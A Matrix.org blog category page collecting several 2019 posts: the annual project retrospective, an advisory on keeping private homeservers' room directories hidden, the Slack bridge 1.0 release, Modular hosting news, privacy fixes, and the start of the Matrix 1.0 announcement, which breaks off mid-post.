General

148 posts tagged with "General" (See all Category)

Atom Feed

The 2019 Matrix Holiday Update!

24.12.2019 00:00 — General Matthew Hodgson

Hi all,

Every year we do an annual wrap-up and retrospective of all the things happening in the Matrix core team - if you’re feeling particularly curious or bored you can check out the 2015, 2016, 2017 and 2018 editions for context. The idea is to look at the bigger picture trends in Matrix outside of the weekly TWIM posts to get an idea of the stuff which we made progress on, and the stuff which still remains.

That said, it’s hard to know where to start - Matrix accelerated more than ever before in 2019, and there’s been progress on pretty much all battlefronts. So as a different format, let’s take the stuff we said we had planned for 2019 from the end of last year’s update and see what we actually achieved...

🔗2019: the immediate priorities

So, our immediate priorities for 2019 were:

  • r0 spec releases across the board (aka Matrix 1.0)
  • Implementing them in Synapse

✅ Well, unless you’ve been floating in a sensory deprivation tank for the last year, hopefully you spotted that Matrix (as a protocol) finally exited beta - starting off with the announcement at FOSDEM in February of the first stable release of the Server-Server API, alongside the Synapse 0.99.x series as we began the process of migrating to the 1.0 APIs.

Specifically this meant killing off self-signed certificates, adding .well-known server discovery and implementing room version semantics so we could upgrade the underlying room version algorithm to fix the residual flaws. This culminated in June with the official release of Matrix 1.0 - now including the remaining APIs and a stable release of Synapse 1.0. The emphasis was on addressing all the main pre-1.0 design flaws rather than adding features or performance, but with 1.0 out the door at last we’ve been able to make progress there too.

  • Landing the Riot redesign

✅ The full redesign of Riot’s UI on Web/Desktop landed shortly after FOSDEM in Feb with The Big 1.0. Cosmetically we got most of the new look & feel in place, and have had very positive feedback overall - although some of the UX thinkos of the old app remain and coming up on the radar for fixing.

  • Finalising the Matrix.org Foundation

✅ This happened too, coincident with releasing Matrix 1.0 in June - read all about it at https://matrix.org/foundation. So far the governance and legal infrastructure the Foundation provides has helped the project significantly, and while it was a mammoth task to organise, we’re very glad it’s here! Huge thanks go out to Jon, Ross and Jutta for agreeing to join the foundation as Guardians - they have been excellent in patiently listening to the various dramas of the year and ensuring Matrix’s neutrality and that we keep an even keel.

  • Landing all the new E2E encryption UX and features

The good news on E2E encryption is that we’ve been making solid progress throughout the year - the bad news is that we are still yet to turn it on by default. Progress updates for the various pieces of the puzzle are as follows:

  • ✅ The final UX is pretty much locked down (after several iterations as we try to tread the balance between trustworthiness and security) - here’s a sneak preview of what we’re aiming at.

  • 🏗 Cross-signing is the single biggest remaining piece of work in progress - letting users attest to the trustworthiness of their own devices, so you only ever have to trust a given user once rather than trusting all their devices individually. We gave a very early demo of an experimental implementation back at FOSDEM in Feb, inspired by some of the initial spec proposal at MSC1680 (MSC = Matrix Spec Change, our process for evolving Matrix).

    However, having played with it a bit, MSC1680 turned out to be too generic and complicated (it worked by the user signing a device with any other of their devices, building a twisted maze of which device vouched for which) - and we replaced it with MSC1756, which shifts the model to be the simpler “the user has a key, which they use to sign their devices”. However, this in turn requires more infrastructure - you need somewhere secure to store your signing key, which prompted MSC1946 - Secure Secret Storage & Sharing (SSSS): the ability to sync your signing key between devices by storing it (encrypted, of course) on the server.

    Meanwhile, it also became obvious that the primitives for key verification needed to be improved too: introducing verification by emoji comparison (MSC1267) and QR codes (MSC1543), and switching key verification to be performed in the context of a DM (MSC2241) so that you can see your verification history, find verifications, and easily dip in and out of verifying users as needed.

    Whilst everyone else was panicking about Matrix 1.0 and associated baggage, Uhoreg was off in the wilderness plugging his way through all of this - iterating on the design, speccing it and implementing it in synapse and matrix-js-sdk, complete with a test jig to demonstrate it all working (part 1 and part 2). Over the last few months the rest of the team has joined him though, and we’ve been frantically working away implementing it all on both Riot/Web, iOS & RiotX/Android. For instance - here’s verification happening in DM between Riot/Web & RiotX a few weeks ago, and here’s a very early (unskinned) cut of verification happening in Riot/Web’s RightPanel a few days ago.

    We were hoping to get cross-signing ready for the end of 2019, but in practice we’re now sprinting to get it done by FOSDEM 2020 in Feb - not least because we have a main-stage talk proposed to tell everyone how we landed it and turned on E2E by default... ;)

  • ✅ Support for non-E2E clients. The last thing we want is to make it impossible to write a simple Matrix client, or to suddenly excommunicate (hah) all the existing Matrix bots & bridges which haven’t implemented E2E. To this end, poljar created pantalaimon - our very own Matrix daemon, which can sit in the background and offload all your E2EE from your Matrix client by acting as a transparent Matrix proxy which magically encrypts everything. Built on matrix-nio and asyncio python3, We use it in production today for running various bots and it works excellently.

  • ✅ Support for search in E2E rooms. Hot off the heels of pantalaimon’s success, poljar also created seshat - a native library for clientside indexing encrypted Matrix events written in Rust, powered by the tantivy full-text search engine. (pantalaimon also has support for indexing via tantivy, which involved contributing python bindings for tantivy, but we ended up going with Rust so we could embed it natively in as many Matrix clients as possible). Seshat is particularly cool in that the indexes themselves are encrypted in on disk - and in future could even be synced between clients using SSSS so you don’t have to reindex your messages every time you log in on a new device. Seshat is implemented behind a labs flag on Riot/Desktop and it will ship as soon Riot/Desktop’s build pipeline is fully updated to support native modules (which will also unlock other goodies, such as using faster/safer native E2E primitives, safer key storage, and Discord-style keyboard-shortcuts for VoIP).

  • 🏗 Fixing “unable to decrypt” errors. We’ve done big sprint over the last month or so to track down the final straggling causes of unable to decrypt errors. Some of these are legitimate bugs (e.g. https://github.com/matrix-org/synapse/issues/6399) - but many are artefacts of the current architecture: for instance, if the sender has no way to know your device was in the room when it encrypted a message, you won’t be able to decrypt. We’re addressing this by improving better error messages and feedback so the user isn’t surprised by what’s going on (aiming for Jan) - and in future we’ll have to revisit E2E’s fundamentals to ensure that it’s impossible to receive a message without also receiving the key to decrypt it.

  • ✅ Support for push notifications in E2E rooms. This is kinda solved right now by having all clients get (silently) pushed whenever they receive a message in an E2E room with push enabled, and relying on the client to be woken up by the push in order to decrypt the message in order to display the push notification. However, this is battery intensive, and we could probably do better - but this isn’t a blocker for going live.

  • 🏗 Support for FilePanel and NotifPanel in E2E rooms. Seshat should fix this by indexing all your messages (and so tracking whether they contain pushes or files, and populating up your local view of your file & notif panels respectively) - just need to ensure it’s hooked up.

...and that’s where things stand right now on E2E by default. We’ll start turning it on by default for private rooms as soon as the UX has landed (probably starting first with new DMs and private rooms, prompting the user in case they want to opt out - and then migrating existing ones). It’s worth noting that we have poured a lot of work into E2E encryption now - often to the detriment of the rest of Matrix; our rich featureset and decentralisation has combined to make this a tough nut to crack, but the end is in sight. Thanks to all for your patience and support while we’ve been working through this.

That takes us to the end of the stuff we planned to prioritise in 2019 - but what about the more speculative medium-term stuff which was on the menu this time last year?

🔗2019: the medium-term priorities

  • Reworking and improving Communities/Groups.

We have some really promising UX work and a fairly early spec proposal (MSC1772), but work in earnest hasn’t kicked off yet. It’s going to be one of the next big projects though.

  • Reactions.

✅ Riot now has Reactions! 🎉🎉🎉 The only remaining work is to finish the remaining rough edges of the spec proposal (MSC1849) and actually land them in the Matrix spec proper.

  • E2E-encrypted Search

Seshat exists! (see above)

  • Filtering. (empowering users to filter out rooms & content they're not interested in).

✅ We’ve ended up thinking lots in 2019 about empowering users to filter content. The main impetus has been to ensure that users and communities can filter out abuse (on their own terms), and also to start building infrastructure which can be used for folks to share their own filters. Over the last few months, this has started to take concrete form - with the arrival of MSC2313 “Moderation policies as rooms”, and Mjolnir - a bot you can run to enforce moderation policies on your rooms. It’s all quite early, but we expect a lot more work in this space over the coming year (and it’s wryly amusing that Twitter has also woken up to it being an interesting problem needing to be solved.)

  • Extensible events

Sorry folks; no progress here since a flurry of spec work (MSC1767) back in Jan 2019. The good news is that the spec proposal seems to be relatively well received. The bad news is that we haven’t had bandwidth to finish reviewing it, implementing it and migrating it anywhere. It blocks a bunch of really useful stuff in Matrix, and there are users willing to pay for it (via New Vector) - we’ll get to it as soon as we can.

  • Editable messages.

✅ These landed too and are a thing of joy! Just need to merge MSC1849.

  • Extensible Profiles (we've actually been experimenting with this already).

Similar to Extensible Events, there was a flurry of spec work (MSC1769) back in Jan, but little progress since. This will also unlock a lot of really useful features - e.g. custom status, custom profile data, social timeline rooms etc. We’ll likely get to it shortly after communities work.

  • Threading.

🏗 So we actually landed label-based threading (MSC2326) in Synapse 1.6, but it’s not exposed in Riot yet (or elsewhere). It doesn’t have quite the same semantics as Slack-style threading; the idea is to filter down your room based on which messages are tagged as part of a given topic. However, it’s very powerful, and it’ll be fun to add it to Riot at some point in 2020. Meanwhile, better-than-label-based-threading is also on the cards, although slightly lower priority than some of the other stuff in this section.

  • Landing the Riot/Android rewrite

🏗 As you probably know, RiotX is a full rewrite of Riot/Android in Kotlin using modern AndroidX and Jetpack idioms - and it entered beta back in June. Since then we’ve been frantically working away on both playing catch-up with the old app… as well as implementing all the new stuff (reactions, edits, new E2E verification, cross-signing etc) which makes no sense to waste time adding in Riot/Android, but also pushes out the timeline on RiotX itself.

We’re currently sprinting to try to get RiotX ready for FOSDEM in February - hopefully users will have felt the app starting to really stabilise over the last few months (it even supports breadcrumbs now!)

  • Considering whether to do a similar overhaul of Riot/iOS

🏗 It’s cheating a bit, but Manu (the lead developer on Riot/iOS and delivery manager of Riot/Mobile in general) has been hacking on an entirely new client called Messagerie in his spare time, using SwiftUI. The idea of throwing away the whole UI layer and replacing it with the latest best practices sounds suspiciously like RiotX - it’ll be interesting to see how RiotX/iOS takes shape next year!

  • Scaling synapse via sharding the master process

We ended up bottlenecked on IO rather than CPU in 2019, and as a result we worked on splitting synapse’s database across multiple database instances on a per-table granularity. However, the master process itself doesn’t shard yet; so we’re now bottlenecked on CPU and need to get on and do this asap to unlock further Synapse scalability for mega-monolithic-deployments like the Matrix.org homeserver.

  • Bridge UI for discovery of users/rooms and bridge status

🏗 There’s been a bit of movement in the last few weeks on this, but nothing concrete yet.

  • Bandwidth-efficient transports

✅ We finished the 100bps CoAP transport proof-of-concept for Matrix, demoed it at FOSDEM and shipped it in March. However, we haven’t progressed it much further; it really needs a corporate sponsor who wants to fund work to finish it off and bake it properly into Matrix. If you’re interested, please get in touch.

  • Bandwidth-efficient routing

🏗 We also did a bunch of related work on bandwidth-efficient routing, which sadly hasn’t been released yet. However, it’s interesting to note that the Decentralized Systems and Network Services Research Group at Karlsruhe Institute of Technology’s Institute of Telematics has been looking into this space too - c.f. their A Glimpse of the Matrix paper, which ponders very similar problems.

  • Getting Dendrite to production.

🏗 Dendrite work has been bubbling away in the background thanks to Anoa, Brendan, cnly (our GSoC dendrite contributor) and others. Inevitably most of our bandwidth has gone into getting Synapse to 1.0 and making sure it’s fit for purpose, but we want and need to keep Dendrite alive for next-generation purposes - and in fact New Vector is hiring new people to work on it in 2020.

  • Inline widgets (polls etc)

🏗 We have an MSC (MSC2192), but not an implementation.

  • Improving VoIP over Matrix.

Very little progress here, frustratingly. Jitsi has been upgraded and conference calls should kick ass these days (let us know if they don’t), but 1:1 needs a lot of love. Hopefully we’ll get to it in 2020.

  • Adding more bridges, and improving the current ones.

Lots of bridging progress in 2020 - all new puppeting Slack support; huge fixes to the IRC bridge (including shifting to Postgres at last); Bifrost (the XMPP bridge) progressed too, and there’s been loads of community bridging work around WhatsApp, Discord and others.

  • Account portability
  • Replacing MXIDs with public keys

We’ve just started looking at implementing these seriously via MSC1228 (as of last week) - expect progress in 2020.

So that sums up progress on the medium term menu - as you can see, a bunch actually happened; a bunch made progress; a few didn’t happen at all.

🔗2019: the longer-term priorities

Finally, on the longer term radar:

  • Shared-code cross-platform client SDKs (e.g. sharing a native core library between matrix-{js,ios,android}-sdk)

No progress here. Instead, all three main platforms have continued to write and maintain their own platform-specific SDKs for now. Seshat however will be the first piece of native rust code shared across all 3 platforms - let’s see how that goes first...

  • Matrix daemons (e.g. running an always-on client as a background process in your OS which apps can connect to via a lightweight CS API)

Pantalaimon lives!

  • Push notifications via Matrix (using a daemon-style architecture)

No progress here, unless you count the CoAP low-bandwidth work. However, Bubu (also Riot/Android Fdroid maintainer) has been working on a project called OpenPush which looks to help in this space (albeit not built on Matrix, but could be used by Matrix). There are a few other related projects. If someone wants to build this on top of Matrix + CoAP please get in touch asap!

  • Clientside homeservers (i.e. p2p matrix) - e.g. compiling Dendrite to WASM and running it in a service worker.

🏗 Work is actually happening on this currently. Dendrite has successfully compiled to WASM and runs, and we’ve had it (almost) talking HTTP tunnelled over libp2p as part of P2P Matrix experiments. In 2020 we’re going to be investing a lot in P2P Matrix - to give users full control of their communication without even having to run a server, and also to simplify onboarding and account portability enormously. We have a talk about this accepted for FOSDEM 2020 (The Path to P2P Matrix) and we’re actively (frantically) hacking on Dendrite to make it happen - keep an eye out for how things develop!

  • Experimenting with MLS for E2E Encryption

🏗 Now that E2E-by-default has entered the “it works! let’s land it in Riot asap” phase, Uhoreg has had some time to start thinking about the longer term future of encryption in Matrix. MLS (Messaging Layer Security) is the IETF’s initiative to define a standard mechanism for end-to-end-encrypted group chats, which has some major algorithmic improvements over Olm/Megolm and the Double Ratchet Algorithm as used by Signal. The catch is that it doesn’t work at all well with decentralisation - however, we’ve been working with them to try to ensure MLS can work in a decentralised world. More recently, uhoreg has had a chance to think a lot more about this and we’re working on a proposal for Decentralised MLS which builds on plain MLS while also giving the semantics needed for Matrix. It’s all very experimental at this point (and the proof-of-concept implementation is written in Julia!) - but looks promising. We’ll share more asap, and will certainly be investing more time in this in 2020..

  • Storing and querying more generic data structures in Matrix (e.g. object trees; scene graphs)

Sadly no progress here :(

  • Alternate use cases for VR, IoT, etc.

...and none here either.

So, of all the myriad things on our radar for 2019 (as of Dec 2018), hopefully this gives some idea of where we hit the mark.

🔗2019: the unpredictable bits

However, there’s also a tonne of other stuff which happened which wasn’t explicitly on the radar. On the synapse side, we finished fully migrating from Python 2 to Python 3, and started using asyncio and all the latest Python 3 goodies! We finally implemented configurable history retention for servers and rooms! We even implemented self-destructing messages in Synapse (not that Riot exposes them yet). And there has been loads of optimisation and performance work since 1.0 landed in June.

On the ops side, we overhauled all our ops processes and security after the Matrix.org datacenter breach in April, throwing away our legacy infrastructure and rebuilding it properly - and subsequently have been expanding our ops team from one dedicated ops person to four. We also found ourselves having to do another emergency datacenter migration back in November when the old one was unable to reliably service IO for our database cluster.

We also spent a bunch time after shipping Matrix 1.0 working on tightening up Matrix’s privacy model - particularly around third party identity servers, integration managers, and making sure that folks self-hosting Matrix don’t accidentally depend on use 3rd party services without realising it. If you missed out on the fun at the time, you can read all about it here and here. This ended up being way more work than we expected, but we’re very glad to have sorted it out now.

Meanwhile, mainstream uptake of Matrix has properly taken off, with the French Government launching Tchap (their fork of Riot), now with hundreds of thousands of daily active users. The German Government revealed today that they are also formally trialling Matrix, starting with the Bundeswehr (Ministry of Defense); we’ve been helping them out with the deployment too. It is not an exaggeration to suggest that we could end up with an official cross-government Matrix network, publicly federated with the wider Internet, for self-hosted encrypted decentralised instant messaging. In fact Ulrich Kelber, the Bundesdatenschutzbeauftragte (Federal Data Protection Commissioner) for Germany pointed out: “You could even set up a privacy-friendly messenger service in cooperation with France, which in the medium term could represent a real alternative to existing products on the market as a pan-European solution”.

Alongside all this, Mozilla announced they are replacing the Moznet IRC network with Matrix; KDE joined Matrix in Feb, Wikimedia is getting set up on their server, and more and more massive players (including the largest in the world) keep getting in touch to find out how they can best get onboard Matrix - it’s incredibly exciting. It also means that we were able to raise capital to keep folks employed to work on Matrix fulltime via New Vector and scale up Modular.im as a paid hosting platform - which massively helps support core Matrix development.

🔗2020

All that remains now is to make some predictions for 2020. Our main priorities are:

  • Get E2E enabled for private rooms by default (see above).

  • Riot First-time User Experience (FTUE). While we redesigned Riot’s UI in 2019, there are still far too many weird gotchas which trip over new users. Starting in October we began a shift to completely change how Riot development works - transitioning the project to being led by the UX design team rather than the dev team, and ensuring that the design team considers the app holistically across all 3 platforms. Above all else, our priority is to make it kick ass for normal non-technical mainstream users - not just for opensourcey wizards. This is a tough ask, but we believe it’s literally make-or-break for the project in the long term if Matrix is ever to become as prevalent as Slack or WhatsApp, and we are throwing everything we have at it. The second that E2E is on by default, the entirety of the Riot teams will be focusing on the mission to clear our FTUE backlog.

  • RiotX. We’re shipping RiotX on Android as fast as we can - currently users on Riot/Android are left high and dry and we need to do everything we can to finish RiotX and get them upgraded as rapidly as possible.

  • Communities. Off the back of FTUE comes the importance of grouping rooms & users together into communities in a much better way than we have today. This will be up next.

  • Synapse: shard the master by user/room to avoid being it being bottlenecked on CPU. We also need to apply smarter queue management on federation traffic to better reduce the memory footprint (and so eliminate complexity limits on small-footprint hosted servers!) - and we also desperately need to speed up joins.

  • Dendrite & P2P Matrix: the plan currently is to use Dendrite as the basis for our P2P Matrix experiments. In practice this means making it federate using MSC1228-semantics (no point in wasting time implementing the ‘legacy’ key management), and then experiment with hooking it up to various P2P transports (e.g. our low-bandwidth CoAP transport) and discovery systems (e.g. mDNS; libp2p; etc). How we go about actually getting it into production depends entirely on how well the experiment goes; we could evolve Matrix to be hybrid CS/P2P; we could treat it as a new protocol and bridge to it; who knows. Watch this space...

  • MLS: figure out our plan for next-generation E2E - for better scaling, and better reliability, and what (if anything) we should do with MLS.

  • Bridges: loads of work on the horizon to put a better UX on Bridging. Bridge stability has improved enormously over the last year (thanks Half-Shot!) but we need to transition from being robust but ugly to being robust and polished...

  • Spec: we need to work out how to go faster on reviewing MSCs (both our own and from the wider community). While the governance process in general feels healthier than it’s ever been, empirically we’re not exactly burning through the MSC backlog - and this is in part that MSC work is squeezed in alongside the other dayjob stuff everyone’s working on. Finding the right balance between sculpting spec and sculpting code is tough, but we’re going to try to improve it in 2020.

  • Abuse / Reputation: we want to empower users to make their own minds up about what content they want to see and not see on Matrix (or what they want to host or not host on their servers / communities / rooms). Mjolnir is a good start, but we’ll be continuing to work on this throughout the year.

Meanwhile, all the things listed above that we didn’t get to in 2019 are of course still options on the menu too.

So there you have it. I’ve not even tried to talk about the amazing stuff that the wider Matrix community has been up to - whether that’s amazing new clients like Ditto (React Native!) or Nio! (SwiftUI), or new bridges like mautrix-facebook and mautrix-hangouts, or even poljar’s secret rewrite of weechat-matrix in Rust; your best bet there is to skim through TWIM. Huge undying thanks go out though to everyone who builds on Matrix and keeps the ecosystem maturing and growing (especially while we’re scurrying around shoring up the foundations) - there’s simply no point in Matrix as a protocol without the vibrant community building on top.

All told, it’s been a bit of an epic year (both in terms of wins and fails), and all that remains is to thank everyone who continues to use Matrix (particularly our Patreon supporters) for their ongoing support and for helping the project accelerate forwards. More than ever before, the world needs free and open communication open to all; the age of proprietary communication silos may be coming to an end - consigned to live alongside AOL CDs and Compuserve IDs in the history books. With your support, Matrix can provide a decent mainstream yet decentralised alternative - and we’ll do everything we can to make that happen in 2020.

Happy holidays!

Matthew, Amandine & the whole Matrix.org team.

Avoiding unwelcome visitors on private Matrix servers

09.11.2019 00:00 — Privacy Matthew Hodgson

Hi all,

Over the course of today we've been made aware of folks port-scanning the general internet to discover private Matrix servers, looking for publicly visible room directories, and then trying to join rooms listed in them.

If you are running a Matrix server that is intended to be private, you must correctly configure your server to not expose its public room list to the general public - and also ensure that any sensitive rooms are invite-only (especially if the server is federated with the public Matrix network).

In Synapse, this means ensuring that the following options are set correctly in your homeserver.yaml:

# If set to 'false', requires authentication to access the server's public rooms
# directory through the client API. Defaults to 'true'.
#
#allow_public_rooms_without_auth: false

# If set to 'false', forbids any other homeserver to fetch the server's public
# rooms directory via federation. Defaults to 'true'.
#
#allow_public_rooms_over_federation: false

For private servers, you will almost certainly want to explicitly set these to false, meaning that the server's "public" room directory is hidden from the general internet and wider Matrix network.

You can test whether your room directory is visible to arbitrary Matrix clients on the general internet by viewing a URL like https://sandbox.modular.im/_matrix/client/r0/publicRooms (but for your server). If it gives a "Missing access token" error, you are okay.

You can test whether your room directory is visible to arbitrary Matrix servers on the general internet by loading Riot (or similar) on another server, and entering the target server's domain name into the room directory's server selection box. If you can't see any rooms, then are okay.

Relatedly, please ensure that any sensitive rooms are set to be "invite only" and room history is not world visible - particularly if your server is federated, or if it has public registration enabled. This stops random members of the public peeking into them (let alone joining them).

Relying on security-by-obscurity is a very bad idea: all it takes is for someone to scan the whole internet for Matrix servers, and then trying to join (say) #finance on each discovered domain (either by signing up on that server or by trying to join over federation) to cause problems.

Finally, if you don't want the general public reading your room directory, please also remember to turn off public registration on your homeserver. Otherwise even with the changes above, if randoms can sign up on your server to view & join rooms then all bets are off.

We'll be rethinking the security model of room directories in future (e.g. whether to default them to being only visible to registered users on the local server, or whether to replace per-server directories with per-community directories with finer grained access control, etc) - but until this is sorted, please heed this advice.

If you have concerns about randoms having managed to discover or join rooms which should have been private, please contact [email protected].

matrix-appservice-slack bridge 1.0 is here!

03.10.2019 00:00 — General Half-Shot

Hello Matrix enthusiasts! Yesterday we released matrix-appservice-slack 1.0. This marks a major milestone in bridge development for the Matrix.org team, being our first bridge to ever reach 1.0. The decision to release this version came after we decided that the bridge had gained enough features and reached a point of stability where it could be deployed in the wild with minimal risk.

For those not in the know, the Slack bridge is Node.JS based, and bridges slack channels & users into Matrix seamlessly. And for those wondering, yes it works with Mattermost too (since their API is compatible with Slack)! In previous versions only a limited subset of features were supported, making heavy usage of Slack’s webhook API. As of 1.0, the bridge now makes use of the newer Slack Events/RTM API which gives us all we need for a richer bridging experience. Everything from edits and reactions to typing notifications is supported in the 1.0 release.

Finally for those who are self hosting, we are pleased to offer the ability to "puppet" your Slack account using the bridge. Puppeting is the process in which the bridge will send messages as if you were sending them from the Slack client directly, when you talk using your Matrix account. This opens the door to seamless bridging and direct messaging support.

For those wishing to bridge their whole workspace across, picard exists as a tool to manage large scale Slack bridge deployments. This tool is provided by Cadair and SolarDrew

Slack Screenshot Threading & Reactions!

The bridge has undergone some pretty serious code surgery as well. The whole codebase has been rewritten in TypeScript to take advantage of type checking and generic types. The bridge is currently based upon the matrix-appservice-bridge library. The datastore interface now supports PostgreSQL, which allows for administrators to inspect and edit the database while the bridge is running, as well as offering helpful performance boost over the NeDB datastore format that was used previously. Finally, the codebase has proper Unit and Integration Tests to ensure new changes will not cause any regressions in behaviour. In short, now is an excellent time to get involved and hack on the bridge. There is already a crafted list of easy issues for new and experienced bridge devs.

Grafana memory usage graph Memory usage of the bridge comparison

Grafana CPU usage graph CPU usage of the bridge comparison

In terms of how many users matrix.org is currently serving at the moment, we present to you some figures:

  • 2562 bridged rooms
  • 764 teams connected to the bridge
  • 103711 events have passed through the bridge since the launch of 0.3.2

Of course, our work doesn’t stop at 1.0. The plan for the immediate future of the bridge is to continue adding support for other event types coming from Matrix and Slack to create an ever richer experience. Obvious features are things like topic changes, and syncing membership across the bridge. In the long term future we would also like to add community support to the bridge, so whole Slack workspaces can be bridged across with a single click.

That’s all from me, and I would like to say a massive thank you to Cadair and Ben for both their code and review work on the project and as always, thank you to the community for using the bridge and reporting issues. 🙂

Useful links:

5-user Matrix homeserver hosting now available from Modular

17.07.2019 00:00 — General Modular.im

Hi all,

If you’ve been looking for a way to have you own Matrix homeserver without having to run it yourself, you may be interested to hear that Modular (the Matrix hosting provider run by New Vector, the startup which hires many of the Matrix core team) is now offering a personal-sized small homeserver hosting service, supporting a minimum size of 5 user servers.

A lot of recent performance work on Synapse has been driven by the need to make smaller dedicated servers more efficient to run - and so if you run your own homeserver you’ll be benefiting from all this work too :) Meanwhile, if you choose to outsource your server hosting to Modular, you’ll be indirectly supporting core Matrix and Synapse development, given most of the core Matrix team work for New Vector - it’s through buying services like this which lets us keep folks able to hack on Matrix as their day job.

See more details over at the Modular blog post!

Tightening up privacy in Matrix

30.06.2019 00:00 — General Matthew Hodgson

Hi all,

A few weeks ago there was some discussion around the privacy of typical Matrix configurations, particularly how Riot's default config uses vector.im as an Identity Server (for discovering users on Matrix by their email address or phone number) and scalar.vector.im as an Integration Manager (i.e. the mechanism for adding hosted bots/bridges/widgets into rooms). This means that Riot, even if using a custom homeserver and running from a custom Riot deployment, will try to talk to *.vector.im (run by New Vector; the company formed by the core Matrix team in 2017) for some operations unless an alternative IS or IM has been specified in the config.

We haven't done as good a job at explaining this as we could have, and this blog post is a progress update on how we're fixing that and improving other privacy considerations in general.

Firstly, the reason Riot is configured like this is for the user's convenience: in general, we believe most users just want to discover other people on Matrix as easily as possible, and a logically-centralised server for looking up user matrix IDs by email/phone number (called third party IDs, or 3PIDs) is the only comprehensive way of doing so. Decentralising this data while protecting the privacy of the 3PIDs and their matrix IDs is a Hard Problem which we're unaware of anyone having solved yet. Alternatively, you could run a local identity server, but it will end up having to delegate to a centralised identity server anyway for IDs it has no other way to know about. Similarly, providing a default integration server that just works out of the box (rather than mandating the user configures their own) is a matter of trying to keep Riot's UX simple, especially when onboarding users, and especially given Riot's reputation for complexity at the best of times.

That said, the discussion highlighted some areas for improvement. Specifically:

  1. When doing work on making Matrix GDPR compliant back in May 2018, we set up a single privacy policy for the services we run, and got users to agree to it by locking them out of the matrix.org homeserver until they did. However, we missed that users not on the matrix.org homeserver might still be using our Identity Service (IS) & Integration Manager (IM) without accepting the privacy policy. Over the last few weeks we've been working on addressing this - it turns out that it's a pain to fix, given the Identity Service doesn't have the concept of users, so tracking which users have agreed to the policy policy or not means some fairly major changes. The current proposal is to change the Identity Service to use a form of OpenID to authenticate users against their homeserver in order to check they've accepted the IS's terms of use - see MSC2140 for the gory details.

Meanwhile, Riot is being updated to prompt the user to accept the IS & IM terms of use (if different to the HS's), and thus make it crystal clear to the user that they are using an IS & IM and that they have the option not to if desired - see https://github.com/vector-im/riot-web/issues/10167 and associated issues. This includes also explicitly prompting the user as to whether they want 3PIDs they provide at registration to be discoverable, as per https://github.com/vector-im/riot-web/issues/10091.

  1. Riot on iOS & Android gives the option of scanning your local addressbook to discover which of your contacts are on Matrix. The wording explaining this wasn't clear enough on Android - which we promptly fixed. Separately, the contact details sent to the server are currently not obfuscated. This is partially because we hadn't got to it, and partially because obfuscating them doesn't actually help much with privacy, given an attacker can just scan through possible obfuscated phone numbers and email addresses to deobfuscate them. However, we've been working through obfuscating the contact details anyway by hashing as per MSC2134, which has all the details. We're also adding an explicit lookup warning in Riot/Web, as per https://github.com/vector-im/riot-web/issues/10093.

  2. There was a bug where Riot/Web was querying the Integration Manager every time you opened a room, even if that room had no integrations (actually, it did it 3 times in a row). This got fixed and released in Riot/Web 1.2.2 back on June 19th.

  3. Matrix needs to authenticate whether events were actually sent by the server that claimed to send them. We do this by having servers sign their events when they create them, and publishing the public half of their signing keys for anyone to query. However, this poses problems if you receive an event which is signed by a server which isn't currently online. To solve this, we have the concept of trusted_key_servers (aka notary servers), which your server can query to see if they know about the missing server's keys. By default, matrix.org is configured as Synapse's trusted notary, but you can of course change this. If you choose an unreliable server as the notary (e.g. by not setting one at all) then there's a risk that you won't be able to look up signing keys, and a splitbrain will result where your server can't receive certain events, but other servers in the room can. This can then result in your server being unable to participate in the room entirely, if it's missing key events in the room's lifetime.

    Our plan here is to get rid of notaries entirely by changing how event signing works as per MSC1228, but this is going to take a while. Meanwhile we're going to check Synapse's code to ensure it doesn't talk to the notary server unnecessarily. (E.g. it should be caching the signing keys locally, and it should only use the notary server if the remote server is down.)

  4. When doing VoIP in Matrix, clients need to use a TURN server to discover their network conditions and perform firewall traversal. The TURN server should be specified by your homeserver (and each homeserver deployment should ideally include a TURN server). However, for users who have not configured a TURN server, Riot (on all 3 platforms) defaulted to use Google's public STUN service (stun.l.google.com). STUN is a subset of TURN which provides firewall discovery, but not traffic relaying. This slightly increased the chances of calls working for users without a proper TURN server, but not by much - and rather than fall back to Google, we've decided to simply remove it from Riot (e.g. https://github.com/matrix-org/matrix-ios-sdk/commit/24832a2b14fb72ae6f051d5aba40262d11eef65d). This means that VoIP might get less reliable for users who were relying on this fallback, but you really should be running your own TURN server anyway if you want VoIP to work reliably on your homeserver.

  5. We should make it clearer in Riot that device names are world-readable, and not just for the user's own personal reference. This is https://github.com/vector-im/riot-web/issues/10216

As you can see, much of the work on improving these issues is still in full swing, although some has already shipped. As should also be obvious, these issues are categorically not malicious: Matrix (and Riot) literally exists to give users full control and autonomy over their communication, and privacy is a key part of that. These are avoidable issues which can and will be solved. It's worth noting that we have to prioritise privacy issues alongside all the other development in Matrix however: there's no point in having excellent privacy if there are other bugs stopping the platform from being usable.

We'll do another blog post to confirm once most of the fixes here have landed - meanwhile, hopefully this post provides some useful visibility on how we're going about improving things.

Introducing Matrix 1.0 and the Matrix.org Foundation

11.06.2019 00:00 — General Matthew Hodgson

🔗Matrix 1.0

Hi all,

We are very excited to announce the first fully stable release of the Matrix protocol and specification across all APIs - as well as the Synapse 1.0 reference implementation which implements the full Matrix 1.0 API surface.

This means that after just over 5 years since the initial work on Matrix began, we are proud to have finally exited beta!! This is the conclusion of the work which we announced at FOSDEM 2019 when we cut the first stable release of the Server-Server API and began the Synapse 0.99 release series in anticipation of releasing a 1.0.

Now, before you get too excited, it’s critical to understand that Matrix 1.0 is all about providing a stable, self-consistent, self-contained and secure version of the standard which anyone should be able to use to independently implement production-grade Matrix clients, servers, bots and bridges etc. It does not mean that all planned or possible features in Matrix are now specified and implemented, but that the most important core of the protocol is a well-defined stable platform for everyone to build on.

On the Synapse side, our focus has been exclusively on ensuring that Synapse correctly implements Matrix 1.0, to provide a stable and secure basis for participating in Matrix without risk of room corruption or other nastinesses. However, we have deliberately not focused on performance or features in the 1.0 release - so I’m afraid that synapse’s RAM footprint will not have got significantly better, and your favourite long-awaited features (automatically defragmenting rooms with lots of forward extremities, configurable message retention, admin management web-interface etc) have not yet landed. In other words, this is the opposite of the Riot 1.0 release (where the entire app was redesigned and radically improved its performance and UX) - instead, we have adopted the mantra to make it work, make it work right, and then (finally) make it fast. You can read the full release notes here. It’s also worth looking at the full changelog through the Synapse 0.99 release series to see the massive amount of polishing that’s been going on here.

All this means that the main headline features which land in Matrix 1.0 are vitally important but relatively dry:

